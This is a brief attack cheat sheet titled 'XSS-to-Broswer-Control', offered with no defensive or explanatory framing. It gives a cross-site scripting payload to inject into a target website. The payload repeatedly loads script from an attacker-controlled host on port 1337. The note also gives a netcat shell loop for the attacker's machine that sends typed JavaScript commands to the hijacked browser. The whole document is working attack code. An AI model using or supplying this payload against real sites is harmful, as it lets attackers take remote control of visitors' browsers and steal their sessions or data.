XSS-to-Broswer-Control

• Website to Attack:

• <script>setInterval(function(){d=document;z=d.createElement("script");z.src="//192.168.78.129:1337";d.body.appendChild(z)},0)</script>

• Attackers Machine:

• while :; do printf "@x11>$ "; read c; echo $c | nc -vvlp 1337 >/dev/null; done